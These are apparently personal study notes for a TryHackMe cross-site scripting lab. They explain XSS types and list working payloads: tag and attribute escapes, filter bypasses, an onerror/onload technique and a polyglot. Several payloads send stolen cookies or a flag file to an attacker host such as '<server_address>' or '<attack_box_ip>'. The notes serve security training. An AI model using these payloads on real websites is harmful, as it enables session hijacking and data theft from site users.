XSS
XSS (cross-site scripting).
Last updated
XSS (cross-site scripting).
Last updated
Reflected XSS
Stored XSS
DOM XSS
Blind XSS
URL file path, or query parameters
Insecure Javascript functions
eval()
Non-validated user input forms
window.location.x
Eg. window.location.hash
Practice room: https://tryhackme.com/r/room/xss, Task 7 (Perfecting your payload)
Some of the examples listed below are taken from the TryHackMe (THM) practice lab link above.
a) Simply <script>alert('XSS');</script>
Eg. XSS payload input:
<script>alert('XSS');</script>-><input value="<script>alert('XSS');"</script>">
a) "> <script>alert('XSS');</script>
": The first quotation mark is used to escape from the value attribute of the <input> tag
>: The > character is used to close the <input> tag
Eg. XSS payload input:
<script>alert('XSS');</script>-><textarea><script>alert('XSS');</script></textarea>
a) </textarea> <script>alert('XSS');</script>
</textarea>: The <textarea> closing tag to close the textarea
Eg. XSS payload input:
<script>alert('XSS');</script>-><script> document.getElementsByClassName(...)[0].innerHTML='<script>alert('XSS'); ...
a) '; alert('XSS'); //
': To escape from the field
;: To signify end of command on the current line in JavaScript
//: Makes the code after the alert statement to be comments (to not be executed)
b) ' </script> <script> alert('THM');</script>
': To escape from the field
</script>: To close the original <script> tag, to allow for opening of a new <script> tag
Eg. <script>alert('XSS');</script>-><>alert('XSS');</>
a) <scripscriptt>alert('XSS');</scripscriptt>
-> <scripscriptt>alert('XSS');</scripscriptt>
-> <script>alert('XSS');</script>
< and >) (level 6)Eg.
Valid input: /images/test.jpg ->
<img src="/images/test.jpg" >XSS payload input: "> <script>alert('XSS');</script> ->
<img src="" scriptalert('xss');="" script"="">(< and > removed)
How to bypass:
a) /images/cat.jpg " onload="javascript:alert('THM');"
Instead of escaping out of the <img> tag to create a new <script> tag, an inline attribute can be used to call a script instead
/images/cat.jpg: Can be any other valid path to an image that exists. This is to trigger the onload attribute function to be called after the image has loaded.
": The quotation marks right after the invalid image file path is used to escape the src attribute, and create the onload attribute
b) / " onerror="alert('XSS');"
Similar to part a)
/: Can be any other invalid path to an image that does not exists. This is to trigger the onerror attribute function to be called.
": The quotation marks right after the invalid image file path is used to escape the src attribute, and create the onerror attribute
a) <img src="/invalid-path" onerror="alert('XSS');">
b) <img src="/valid-path" onload="alert('THM');">
c) Extract the cookies? ๐ช : <img src="/invalid-path" onerror="(function(){console.log(document.cookie);fetch('https://<server_address>:8888?cookie='+btoa(document.cookie));})()">
Netcat command to listen at the <server_address>:
-> Log the cookie and send an API call with the cookie as the request body
Disallow <script></script> tag
a) Use anchor tag: <a onmouseover="javascript:alert('XSS');">...</a>
b) Use iframe tag: <iframe src="javascript:alert('XSS');">
... refer to OWASP cheat sheet below for more examples
An XSS polyglot is a string of text which can escape attributes, tags and bypass filters all in one.
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('XSS') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('XSS')//>\x3e
Taken from: https://tryhackme.com/r/room/xss
'"> <script>fetch('http://<IP>:[port]?xss=yay')</script>
'"> <script src="http://<IP>:[port]?xss=yay"></script>
<img/>,<object/>,<iframe/>
Blind XSS payload:
"><script>(function(){
fetch("http://127.0.0.1:8080/flag.txt").then(res=>res.text()).then(data=>fetch("http://<attack_box_ip>:<port>?v="+btoa(data)));
})()</script>
